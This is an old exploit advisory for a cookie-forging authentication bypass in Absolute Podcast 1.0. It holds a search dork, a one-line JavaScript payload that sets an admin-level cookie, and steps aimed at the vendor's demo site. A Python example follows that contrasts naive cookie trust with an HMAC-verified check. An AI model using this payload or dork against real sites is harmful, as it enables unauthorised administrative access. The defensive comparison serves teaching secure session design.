###############################################################################################

# Discovered By : Hakxer
# Home : Www.educ-up.com
# Type Gap : Insecure cookie handling
# script : Absolute Podcast V 1.0 [see script] http://www.xigla.com/apodcasting/demo.htm
# Greetz : Allah , Egyptian x Hacker , all my team , All educ-up member
# Team : EgY Coders
#################################################################################################

# Dork : "Powered by Absolute Podcast "

# Poc
==> javascript:document.cookie="xlaAPCuser=userid=1&lvl=1&s=";

# Live Script

# First go to Admin panel : http://www.xigla.com/apodcasting/demo/login.aspx
# [~] javascript:document.cookie="xlaAPCuser=userid=1&lvl=1&s=";
# Second Go to http://www.xigla.com/apodcasting/demo/menu.aspx
# See Admin panel ..

# Have Fun :D

###############################################################################

-------------------------------- The End of Gap -----------------------------------

## Contact : aq5@windowslive.com
### Muslim Hacker .. I love you Mohammed Rasull Allah
######################################################

# milw0rm.com [2008-10-30]
Absolute Podcast 1.0 Remote Insecure Cookie Handling Vulnerability
Hakxer
10/30/2008
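
Added example, not part of the original advisory and not the vendor's code: a server-side check that contrasts trusting the fields of a cookie shaped like `userid=1&lvl=1&s=` with verifying them against a keyed MAC before granting access. Assumptions: `lvl=1` denotes the admin level, the `s` field is reused here to carry an HMAC tag, and `SERVER_KEY` and all function names are hypothetical.

```python
import hashlib
import hmac
from urllib.parse import parse_qs

# Constructed demo key (assumption); a real deployment loads a random secret
# from server-side configuration and never ships it to the client.
SERVER_KEY = b"constructed-demo-key-not-for-production"


def parse_cookie(value):
    """Split 'userid=1&lvl=1&s=...' into a dict, keeping empty fields such as 's='."""
    return {k: v[0] for k, v in parse_qs(value, keep_blank_values=True).items()}


def is_admin_naive(value):
    """The flaw class: authorisation decided from fields the browser can set freely."""
    fields = parse_cookie(value)
    return fields.get("lvl") == "1" and "userid" in fields


def _tag(userid, lvl):
    """HMAC-SHA256 over the identity fields, keyed with the server-side secret."""
    msg = f"userid={userid}&lvl={lvl}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def issue_cookie(userid, lvl):
    """Called only after a successful login; binds the fields to the server key."""
    return f"userid={userid}&lvl={lvl}&s={_tag(userid, lvl)}"


def is_admin_verified(value):
    """Hardened check: reject any cookie whose tag does not match its fields."""
    fields = parse_cookie(value)
    userid, lvl, s = (fields.get(k, "") for k in ("userid", "lvl", "s"))
    if not (userid.isdigit() and lvl.isdigit()):
        return False
    # Compare as bytes in constant time; also copes with non-ASCII input in 's'.
    if not hmac.compare_digest(s.encode(), _tag(userid, lvl).encode()):
        return False
    return lvl == "1"
```

An equivalent design keeps only a random session identifier in the cookie and looks up the user and level in a server-side session store.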